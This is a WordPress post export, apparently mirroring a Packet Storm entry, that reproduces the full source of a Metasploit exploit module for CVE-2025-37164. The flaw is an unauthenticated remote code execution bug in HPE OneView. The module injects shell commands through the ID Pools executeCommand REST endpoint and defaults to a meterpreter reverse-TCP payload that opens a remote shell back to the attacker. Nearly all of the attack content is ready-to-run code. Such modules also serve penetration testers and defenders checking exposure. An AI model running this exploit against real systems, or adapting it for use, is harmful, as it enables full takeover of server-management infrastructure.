{"id":32449,"date":"2025-12-22T11:56:20","date_gmt":"2025-12-22T11:56:20","guid":{"rendered":"http:\/\/localhost\/?p=32449"},"modified":"2025-12-22T11:56:20","modified_gmt":"2025-12-22T11:56:20","slug":"hpe-oneview-unauthenticated-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=32449","title":{"rendered":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-22T17:15:16&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated remote code execution vulnerability against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as the vendor supplied hotfix has not been applied, however some VM&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-22T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-22T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:213220&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-37164&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n    # This module requires Metasploit: https:\/\/metasploit.com\/download\\n    # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Exploit::Remote\\n      Rank = ExcellentRanking\\n    \\n      include Msf::Exploit::Remote::HttpClient\\n      prepend Msf::Exploit::Remote::AutoCheck\\n    \\n      def initialize(info = {})\\n        super(\\n          update_info(\\n            info,\\n            &#8216;Name&#8217; =\\u003e &#8216;HPE OneView unauthenticated RCE&#8217;,\\n            &#8216;Description&#8217; =\\u003e %q{\\n              This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise\\n              (HPE) OneView. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been\\n              applied), however some VM product versions do not enable the vulnerable \\&#8221;ID Pools\\&#8221; endpoint, and are not\\n              exploitable.\\n            },\\n            &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n            &#8216;Author&#8217; =\\u003e [\\n              # Original finder\\n              &#8216;Nguyen Quoc Khanh&#8217;,\\n              # Analysis and exploit\\n              &#8216;remmons-r7&#8217;,\\n              &#8216;sfewer-r7&#8217;\\n            ],\\n            &#8216;References&#8217; =\\u003e [\\n              [&#8216;CVE&#8217;, &#8216;2025-37164&#8217;],\\n              # Vendor advisory\\n              [&#8216;URL&#8217;, &#8216;https:\/\/support.hpe.com\/hpesc\/public\/docDisplay?docId=hpesbgn04985en_us\\u0026docLocale=en_US&#8217;],\\n              # Rapid7 ETR blog\\n              [&#8216;URL&#8217;, &#8216;https:\/\/www.rapid7.com\/blog\/post\/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview\/&#8217;],\\n              # Rapid7 Analysis\\n              [&#8216;URL&#8217;, &#8216;https:\/\/attackerkb.com\/topics\/ixWdbDvjwX\/cve-2025-37164\/rapid7-analysis&#8217;]\\n            ],\\n            &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-16&#8217;,\\n            &#8216;Privileged&#8217; =\\u003e false, # Executes as trm3.\\n            &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;],\\n            &#8216;Arch&#8217; =\\u003e [ARCH_CMD],\\n            &#8216;Targets&#8217; =\\u003e [\\n              [\\n                # Successfully tested with the following payloads against OneView 6.60.07:\\n                #   cmd\/unix\/reverse_ncat_ssl\\n                #   cmd\/linux\/http\/x64\/meterpreter_reverse_tcp\\n                &#8216;Default&#8217;, {\\n                  &#8216;Payload&#8217; =\\u003e {\\n                    &#8216;BadChars&#8217; =\\u003e &#8216;\\&#8221;\\\\&#8217; &#8216;,\\n                    &#8216;Encoder&#8217; =\\u003e &#8216;cmd\/ifs&#8217;\\n                  },\\n                  &#8216;DefaultOptions&#8217; =\\u003e {\\n                    &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/linux\/http\/x64\/meterpreter_reverse_tcp&#8217;\\n                  }\\n                }\\n              ],\\n            ],\\n            &#8216;DefaultTarget&#8217; =\\u003e 0,\\n            &#8216;DefaultOptions&#8217; =\\u003e {\\n              &#8216;RPORT&#8217; =\\u003e 443,\\n              &#8216;SSL&#8217; =\\u003e true\\n            },\\n            &#8216;Notes&#8217; =\\u003e {\\n              &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n              &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n              &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n            }\\n          )\\n        )\\n    \\n        register_options([OptString.new(&#8216;TARGETURI&#8217;, [true, &#8216;Base path&#8217;, &#8216;\/&#8217;])])\\n      end\\n    \\n      def check\\n        # We can pull out the current REST API version number and correlate it back to a major.minor product number\\n        # based on known values. This is informational only, the check routine will leverage the vulnerability to\\n        # identify if the target si actually vulnerable. This is due to the vulnerability not being present on\\n        # some VM versions due to the ID Pool endpoints being disabled.\\n        res_ver = send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;rest&#8217;, &#8216;appliance&#8217;, &#8216;version&#8217;)\\n        )\\n    \\n        return CheckCode::Unknown(&#8216;Connection to \/rest\/appliance\/version failed&#8217;) unless res_ver\\n    \\n        return CheckCode::Unknown(\\&#8221;Unexpected \/rest\/appliance\/version response code #{res_ver.code}\\&#8221;) unless res_ver.code == 200\\n    \\n        json_ver = JSON.parse(res_ver.body)\\n    \\n        version_string = &#8216;Detected &#8216;\\n        version_string += json_ver[&#8216;modelNumber&#8217;] || &#8216;HPE OneView&#8217;\\n        version_string += &#8216; version &#8216;\\n        version_string += json_ver[&#8216;softwareVersion&#8217;] || &#8216;unknown&#8217;\\n    \\n        # We leverage the command execution vulnerability to execute a benign command. We test that this command executed\\n        # successfully below. Note, we aren&#8217;t checking the stdout, so we cannot do a proof-of-execution check like\\n        # \\&#8221;echo $((1+2))\\&#8221; and then test for the result of \\&#8221;3\\&#8221;.\\n        cmd = \\&#8221;echo #{SecureRandom.uuid}\\&#8221;\\n    \\n        res = execute_cmd(cmd, shell: false)\\n    \\n        return CheckCode::Unknown(\\&#8221;#{version_string}. Connection failed\\&#8221;) unless res\\n    \\n        # The vendor hotfix adds an HTTP rewrite rule to force the target endpoint as 404.\\n        # Some Virtual Machine based product versions don&#8217;t support ID Pools, so report 404 for the missing endpoint.\\n        return CheckCode::Safe(\\&#8221;#{version_string}. Target endpoint returned response code #{res.code}\\&#8221;) if res.code == 404\\n    \\n        return CheckCode::Unknown(\\&#8221;#{version_string}. Unexpected response code #{res.code}\\&#8221;) unless res.code == 200\\n    \\n        j = JSON.parse(res.body)\\n    \\n        return Exploit::CheckCode::Vulnerable(version_string) if (j[&#8216;type&#8217;] == &#8216;ExecutableCommand&#8217;) \\u0026\\u0026 (j[&#8216;cmd&#8217;] == cmd) \\u0026\\u0026 (j[&#8216;result&#8217;] == true)\\n    \\n        CheckCode::Unknown(\\&#8221;#{version_string}. Unexpected JSON results\\&#8221;)\\n      rescue JSON::ParserError\\n        return CheckCode::Unknown(&#8216;Failed to parse JSON body&#8217;)\\n      end\\n    \\n      def exploit\\n        res = execute_cmd(payload.encoded, shell: true)\\n    \\n        fail_with(Msf::Exploit::Failure::UnexpectedReply, &#8216;Connection failed&#8217;) unless res\\n    \\n        fail_with(Msf::Exploit::Failure::UnexpectedReply, \\&#8221;Unexpected response code: #{res.code}\\&#8221;) unless res.code == 200\\n    \\n        j = JSON.parse(res.body)\\n    \\n        fail_with(Msf::Exploit::Failure::UnexpectedReply, &#8216;Response is not of type ExecutableCommand&#8217;) if j[&#8216;type&#8217;] != &#8216;ExecutableCommand&#8217;\\n    \\n        # If Runtime.getRuntime().exec succeeds, the \\&#8221;result\\&#8221; will be true. If an IOException was thrown, this is caught and\\n        # the \\&#8221;result\\&#8221; will be false. So we can use this to see if our payload command executed successfully or not.\\n        # We dont fail_with() but rather print_warning() in case the payload executed before the failure\\n        # occurred (i.e. during cleanup).\\n        if j[&#8216;result&#8217;] == false\\n          print_warning(&#8216;Command execution returned a result of false, likely due to an unexpected IOException server-side&#8217;)\\n        end\\n      rescue JSON::ParserError\\n        fail_with(Msf::Exploit::Failure::UnexpectedReply, &#8216;Failed to parse JSON body&#8217;)\\n      end\\n    \\n      def execute_cmd(cmd, shell:)\\n        send_request_cgi(\\n          &#8216;method&#8217; =\\u003e &#8216;PUT&#8217;,\\n          &#8216;uri&#8217; =\\u003e normalize_uri(target_uri.path, &#8216;rest&#8217;, &#8216;id-pools&#8217;, &#8216;executeCommand&#8217;),\\n          &#8216;ctype&#8217; =\\u003e &#8216;application\/json&#8217;,\\n          &#8216;data&#8217; =\\u003e {\\n            # As this is in JSON, we cannot have \\&#8221; or &#8216; characters. We mark these as BadChars so Metasploit will use an\\n            # encoder to avoid them. To shell out to \/bin\/sh -c we need to wrap the arguments in quotes. As we cannot do\\n            # this, we also mark a white space as a BadChar, and use the IFS encoder to encode them. This lets us use\\n            # arbitrary Metasploit command payloads successfully via an unquoted \/bin\/sh -c PAYLOAD\\n            &#8216;cmd&#8217; =\\u003e shell ? \\&#8221;sh -c #{cmd}\\&#8221; : cmd,\\n            &#8216;result&#8217; =\\u003e false\\n          }.to_json\\n        )\\n      end\\n    end&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/213220&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:10,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/213220\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-22T17:15:16&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated remote code execution vulnerability against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,13,53,7,11,5],"class_list":["post-32449","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=32449\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-22T17:15:16&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated remote code execution vulnerability against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=32449\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-22T11:56:20+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220\",\"datePublished\":\"2025-12-22T11:56:20+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449\"},\"wordCount\":1169,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-10.0\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32449#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449\",\"name\":\"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-22T11:56:20+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=32449\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=32449#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=32449","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-22T17:15:16&#8243;,&#8221;description&#8221;:&#8221;This Metasploit module exploits an unauthenticated remote code execution vulnerability against Hewlett Packard Enterprise HPE OneView. All versions below 11.00 are vulnerable so long as...","og_url":"https:\/\/zero.redgem.net\/?p=32449","og_site_name":"zero redgem","article_published_time":"2025-12-22T11:56:20+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=32449#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=32449"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220","datePublished":"2025-12-22T11:56:20+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=32449"},"wordCount":1169,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=32449#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=32449","url":"https:\/\/zero.redgem.net\/?p=32449","name":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-22T11:56:20+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32449#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32449"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32449#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 HPE OneView Unauthenticated Remote Code Execution_PACKETSTORM:213220"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32449","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32449"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32449\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32449"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32449"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32449"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}